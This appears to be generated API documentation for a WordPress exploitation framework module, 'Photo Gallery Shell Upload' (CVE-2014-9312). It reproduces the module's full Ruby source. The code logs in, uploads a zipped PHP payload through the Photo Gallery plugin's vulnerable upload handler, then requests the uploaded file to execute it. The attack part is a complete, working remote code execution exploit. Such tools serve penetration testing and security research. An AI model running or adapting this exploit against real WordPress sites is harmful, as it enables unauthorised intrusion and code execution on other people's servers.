Class: Wpxf::Exploit::PhotoGalleryShellUpload
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin
- Defined in:
- lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #extract_name_from_res(res) ⇒ Object
-
#initialize ⇒ PhotoGalleryShellUpload
constructor
A new instance of PhotoGalleryShellUpload.
- #password ⇒ Object
- #payload_body_builder(name) ⇒ Object
- #run ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ PhotoGalleryShellUpload
Returns a new instance of PhotoGalleryShellUpload.
9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 9 def initialize super update_info( name: 'Photo Gallery Shell Upload', desc: 'Photo Gallery Plugin for WordPress contains a flaw that allows a '\ 'remote attacker to execute arbitrary PHP code. This flaw exists'\ 'because the photo-gallery\photo-gallery.php script allows access'\ 'to filemanager\UploadHandler.php. The post() method in '\ 'UploadHandler.php does not properly verify or sanitize '\ 'user-uploaded files.', author: [ 'Kacper Szurek', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7769'], ['CVE', '2014-9312'], ['URL', 'http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html'] ], date: 'Nov 11 2014' ) ([ StringOption.new( name: 'username', desc: 'The WordPress username to authenticate with' ), StringOption.new( name: 'password', desc: 'The WordPress password to authenticate with' ) ]) end |
Instance Method Details
#check ⇒ Object
52 53 54 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 52 def check check_plugin_version_from_readme('photo-gallery', '1.2.6') end |
#extract_name_from_res(res) ⇒ Object
63 64 65 66 67 68 69 70 71 72 73 74 75 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 63 def extract_name_from_res(res) begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? return nil else return json['files'][0]['name'][0..-5] end rescue end nil end |
#password ⇒ Object
48 49 50 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 48 def password normalized_option_value('password') end |
#payload_body_builder(name) ⇒ Object
56 57 58 59 60 61 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 56 def payload_body_builder(name) builder = Utility::BodyBuilder.new zipped_files = { "#{name}.php" => payload.encoded } builder.add_zip_file('files', zipped_files, "#{name}.zip") builder end |
#run ⇒ Object
77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 77 def run return false unless super = authenticate_with_wordpress(username, password) return false unless emit_info 'Preparing payload...' payload_name = Utility::Text.rand_alpha(10) builder = payload_body_builder(payload_name) upload_dir = "#{Utility::Text.rand_alpha(10)}/" emit_info 'Uploading payload...' res = nil builder.create do |body| res = execute_post_request( url: wordpress_url_admin_ajax, params: { 'action' => 'bwg_UploadHandler', 'dir' => upload_dir }, body: body, cookie: ) end if res.nil? || res.code != 200 emit_error 'Failed to upload payload' emit_error "Server responded with code #{res.code}", true return false else emit_success 'Uploaded the payload', true end emit_info 'Parsing server response...' uploaded_name = extract_name_from_res(res) if uploaded_name.nil? emit_info "Server responded with: #{res.body}", true emit_error 'Unable to parse the server response' return false end php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_admin, upload_dir, uploaded_name, php_file_name) emit_success 'Parsed response', true emit_success "Payload uploaded to #{payload_url}", true emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end true end |
#username ⇒ Object
44 45 46 |
# File 'lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb', line 44 def username normalized_option_value('username') end |